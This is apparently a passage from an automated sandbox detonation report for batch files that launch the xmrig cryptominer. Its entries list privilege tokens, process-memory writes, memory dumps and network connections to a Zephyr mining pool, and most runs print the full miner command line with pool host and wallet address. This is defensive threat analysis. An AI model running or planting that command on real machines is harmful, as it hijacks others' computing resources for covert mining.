| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1464 wrote to memory of 876 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 1464 wrote to memory of 876 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| FR | 20.199.58.43:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.173.189.20.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/876-0-0x0000024FB2580000-0x0000024FB25A0000-memory.dmp
memory/876-1-0x0000024FB25C0000-0x0000024FB25E0000-memory.dmp
memory/876-2-0x0000024FB2600000-0x0000024FB2620000-memory.dmp
memory/876-3-0x0000024FB25E0000-0x0000024FB2600000-memory.dmp
memory/876-5-0x0000024FB25E0000-0x0000024FB2600000-memory.dmp
memory/876-4-0x0000024FB2600000-0x0000024FB2620000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
735s
Max time network
1174s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1152 wrote to memory of 3772 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 1152 wrote to memory of 3772 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/3772-0-0x0000011C1D990000-0x0000011C1D9B0000-memory.dmp
memory/3772-1-0x0000011C1D9D0000-0x0000011C1D9F0000-memory.dmp
memory/3772-3-0x0000011C1D9F0000-0x0000011C1DA10000-memory.dmp
memory/3772-2-0x0000011C1DA20000-0x0000011C1DA40000-memory.dmp
memory/3772-4-0x0000011C1DA20000-0x0000011C1DA40000-memory.dmp
memory/3772-5-0x0000011C1D9F0000-0x0000011C1DA10000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
734s
Max time network
1174s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3568 wrote to memory of 4316 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 3568 wrote to memory of 4316 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/4316-0-0x0000025BC5180000-0x0000025BC51A0000-memory.dmp
memory/4316-1-0x0000025C57340000-0x0000025C57360000-memory.dmp
memory/4316-2-0x0000025C57780000-0x0000025C577A0000-memory.dmp
memory/4316-3-0x0000025C579B0000-0x0000025C579D0000-memory.dmp
memory/4316-4-0x0000025C57780000-0x0000025C577A0000-memory.dmp
memory/4316-5-0x0000025C579B0000-0x0000025C579D0000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
1154s
Max time network
1173s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 320 wrote to memory of 4536 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 320 wrote to memory of 4536 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| NL | 20.103.156.88:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/4536-0-0x000001D434450000-0x000001D434470000-memory.dmp
memory/4536-1-0x000001D435D40000-0x000001D435D60000-memory.dmp
memory/4536-3-0x000001D435D80000-0x000001D435DA0000-memory.dmp
memory/4536-2-0x000001D435D60000-0x000001D435D80000-memory.dmp
memory/4536-5-0x000001D435D80000-0x000001D435DA0000-memory.dmp
memory/4536-4-0x000001D435D60000-0x000001D435D80000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
435s
Max time network
1160s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/2796-0-0x00000261D06D0000-0x00000261D06F0000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
743s
Max time network
1196s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 6004 wrote to memory of 1592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 6004 wrote to memory of 1592 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.240.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
Files
memory/1592-0-0x0000020C11F00000-0x0000020C11F20000-memory.dmp
memory/1592-1-0x0000020C11F50000-0x0000020C11F70000-memory.dmp
memory/1592-2-0x0000020C13920000-0x0000020C13940000-memory.dmp
memory/1592-3-0x0000020C13940000-0x0000020C13960000-memory.dmp
memory/1592-4-0x0000020C13920000-0x0000020C13940000-memory.dmp
memory/1592-5-0x0000020C13940000-0x0000020C13960000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
739s
Max time network
1188s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3796 wrote to memory of 2324 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 3796 wrote to memory of 2324 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (7).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2324-0-0x00000225EB9B0000-0x00000225EB9D0000-memory.dmp
memory/2324-1-0x00000225ED2E0000-0x00000225ED300000-memory.dmp
memory/2324-3-0x00000225ED320000-0x00000225ED340000-memory.dmp
memory/2324-2-0x00000225ED300000-0x00000225ED320000-memory.dmp
memory/2324-5-0x00000225ED320000-0x00000225ED340000-memory.dmp
memory/2324-4-0x00000225ED300000-0x00000225ED320000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
738s
Max time network
1188s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3356 wrote to memory of 2608 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 3356 wrote to memory of 2608 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fd.api.iris.microsoft.com | udp |
| IE | 20.223.36.55:443 | fd.api.iris.microsoft.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/2608-0-0x00000156E33F0000-0x00000156E3410000-memory.dmp
memory/2608-1-0x00000156E3440000-0x00000156E3460000-memory.dmp
memory/2608-2-0x00000156E3460000-0x00000156E3480000-memory.dmp
memory/2608-3-0x00000156E3480000-0x00000156E34A0000-memory.dmp
memory/2608-4-0x00000156E3460000-0x00000156E3480000-memory.dmp
memory/2608-5-0x00000156E3480000-0x00000156E34A0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win10ltsc2021-20241023-en
Max time kernel
737s
Max time network
1199s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4284 wrote to memory of 116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 4284 wrote to memory of 116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/116-0-0x000001E97AFA0000-0x000001E97AFC0000-memory.dmp
memory/116-1-0x000001E97CA70000-0x000001E97CA90000-memory.dmp
memory/116-2-0x000001E97CA90000-0x000001E97CAB0000-memory.dmp
memory/116-3-0x000001E97CAB0000-0x000001E97CAD0000-memory.dmp
memory/116-5-0x000001E97CAB0000-0x000001E97CAD0000-memory.dmp
memory/116-4-0x000001E97CA90000-0x000001E97CAB0000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-10-25 14:08
Reported
2024-10-25 14:28
Platform
win11-20241007-en
Max time kernel
1170s
Max time network
1188s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1392 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
| PID 1392 wrote to memory of 4068 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"
C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.240.197:5332 | us-zephyr.miningocean.org | tcp |
| US | 15.204.244.104:5332 | us-zephyr.miningocean.org | tcp |
Files
memory/4068-0-0x000001EAAB2E0000-0x000001EAAB300000-memory.dmp
memory/4068-1-0x000001EB3ED60000-0x000001EB3ED80000-memory.dmp
memory/4068-3-0x000001EB3F3E0000-0x000001EB3F400000-memory.dmp
memory/4068-2-0x000001EB3F1A0000-0x000001EB3F1C0000-memory.dmp
memory/4068-4-0x000001EB3F1A0000-0x000001EB3F1C0000-memory.dmp
memory/4068-5-0x000001EB3F3E0000-0x000001EB3F400000-memory.dmp